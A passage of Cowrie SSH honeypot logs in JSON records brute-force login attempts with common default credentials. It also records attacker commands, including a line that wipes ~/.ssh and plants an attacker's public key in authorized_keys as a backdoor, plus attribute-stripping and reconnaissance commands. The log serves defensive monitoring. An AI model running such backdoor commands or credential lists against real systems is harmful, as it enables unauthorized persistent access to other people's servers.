0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:08:59.270478Z","src_ip":"212.227.125.160","session":"960997d9d3c8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:08:59.509051Z","src_ip":"201.148.180.50","session":"9eb750f2c401"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:08:59.509882Z","src_ip":"201.148.180.50","session":"9eb750f2c401"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"123456","message":"login attempt [oscar/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:08:59.622893Z","src_ip":"212.227.125.160","session":"960997d9d3c8"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:09:00.722921Z","src_ip":"212.227.125.160","session":"960997d9d3c8"}
{"eventid":"cowrie.login.success","username":"root","password":"suporte01","message":"login attempt [root/suporte01] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:09:05.517465Z","src_ip":"201.148.180.50","session":"9eb750f2c401"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:09:08.949511Z","src_ip":"201.148.180.50","session":"9eb750f2c401"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T01:09:08.950206Z","src_ip":"201.148.180.50","session":"9eb750f2c401"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37844,"dst_ip":"1.2.3.4","dst_port":22,"session":"99f238652920","protocol":"ssh","message":"New connection: 212.227.125.160:37844 (1.2.3.4:22) [session: 99f238652920]","sensor":"my-vps","timestamp":"2025-08-31T01:09:09.626815Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:09:09.627962Z","src_ip":"212.227.125.160","session":"99f238652920"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:09:09.702000Z","src_ip":"212.227.125.160","session":"99f238652920"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler123","message":"login attempt [dolphinscheduler/dolphinscheduler123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:09:09.931170Z","src_ip":"212.227.125.160","session":"99f238652920"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:09:10.262835Z","src_ip":"201.148.180.50","session":"9eb750f2c401"}
{"eventid":"cowrie.session.closed","duration":"12.1","message":"Connection lost after 12.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:09:10.263990Z","src_ip":"201.148.180.50","session":"9eb750f2c401"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:09:11.103702Z","src_ip":"212.227.125.160","session":"99f238652920"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":49688,"dst_ip":"1.2.3.4","dst_port":22,"session":"68c68730c8b6","protocol":"ssh","message":"New connection: 102.88.137.80:49688 (1.2.3.4:22) [session: 68c68730c8b6]","sensor":"my-vps","timestamp":"2025-08-31T01:09:13.927011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:09:13.927754Z","src_ip":"102.88.137.80","session":"68c68730c8b6"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:09:14.057337Z","src_ip":"102.88.137.80","session":"68c68730c8b6"}
{"eventid":"cowrie.login.success","username":"root","password":"admin*123","message":"login attempt [root/admin*123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:09:14.616984Z","src_ip":"102.88.137.80","session":"68c68730c8b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:09:14.892085Z","src_ip":"102.88.137.80","session":"68c68730c8b6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:09:14.892832Z","src_ip":"102.88.137.80","session":"68c68730c8b6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:09:14.894020Z","src_ip":"102.88.137.80","session":"68c68730c8b6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:09:15.025128Z","src_ip":"102.88.137.80","session":"68c68730c8b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:09:15.349070Z","src_ip":"102.88.137.80","session":"68c68730c8b6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:09:15.349998Z","src_ip":"102.88.137.80","session":"68c68730c8b6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:09:15.488783Z","src_ip":"102.88.137.80","session":"68c68730c8b6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:09:15.489682Z","src_ip":"102.88.137.80","session":"68c68730c8b6"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":33779,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd3c36b26800","protocol":"ssh","message":"New connection: 102.88.137.80:33779 (1.2.3.4:22) [session: cd3c36b26800]","sensor":"my-vps","timestamp":"2025-08-31T01:09:15.604353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:09:15.609346Z","src_ip":"102.88.137.80","session":"cd3c36b26800"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:09:15.731266Z","src_ip":"102.88.137.80","session":"cd3c36b26800"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38562,"dst_ip":"1.2.3.4","dst_port":22,"session":"53c9006350f7","protocol":"ssh","message":"New connection: 212.227.235.229:38562 (1.2.3.4:22) [session: 53c9006350f7]","sensor":"my-vps","timestamp":"2025-08-31T01:09:16.196010Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:09:16.230398Z","src_ip":"102.88.137.80","session":"cd3c36b26800"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:09:17.040879Z","src_ip":"212.227.235.229","session":"53c9006350f7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:09:17.041568Z","src_ip":"212.227.235.229","session":"53c9006350f7"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:09:17.354443Z","src_ip":"102.88.137.80","session":"cd3c36b26800"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":33780,"dst_ip":"1.2.3.4","dst_port":22,"session":"05043476c568","protocol":"ssh","message":"New connection: 102.88.137.80:33780 (1.2.3.4:22) [session: 05043476c568]","sensor":"my-vps","timestamp":"2025-08-31T01:09:17.476157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:09:17.477083Z","src_ip":"102.88.137.80","session":"05043476c568"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:09:17.599673Z","src_ip":"102.88.137.80","session":"05043476c568"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:09:18.132962Z","src_ip":"102.88.137.80","session":"05043476c568"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:09:18.256855Z","src_ip":"102.88.137.80","session":"05043476c568"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:09:18.263419Z","src_ip":"102.88.137.80","session":"68c68730c8b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49572,"dst_ip":"1.2.3.4","dst_port":22,"session":"671f05e6e124","protocol":"ssh","message":"New connection: 212.227.125.160:49572 (1.2.3.4:22) [session: 671f05e6e124]","sensor":"my-vps","timestamp":"2025-08-31T01:09:20.063794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:09:20.064461Z","src_ip":"212.227.125.160","session":"671f05e6e124"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:09:20.138856Z","src_ip":"212.227.125.160","session":"671f05e6e124"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-31T01:09:20.410471Z","src_ip":"212.227.125.160","session":"671f05e6e124"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:09:21.560726Z","src_ip":"212.227.125.160","session":"671f05e6e124"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123456","message":"login attempt [dev/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:09:23.018265Z","src_ip":"212.227.235.229","session":"53c9006350f7"}
{"eventid":"cowrie.session.closed","duration":"10.9","message":"Connection lost after 10.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:09:27.123572Z","src_ip":"212.227.235.229","session":"53c9006350f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41102,"dst_ip":"1.2.3.4","dst_port":22,"session":"148021147160","protocol":"ssh","message":"New connection: 212.227.125.160:41102 (1.2.3.4:22) [session: 148021147160]","sensor":"my-vps","timestamp":"2025-08-31T01:09:30.521707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:09:30.522906Z","src_ip":"212.227.125.160","session":"148021147160"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:09:30.597092Z","src_ip":"212.227.125.160","session":"148021147160"}
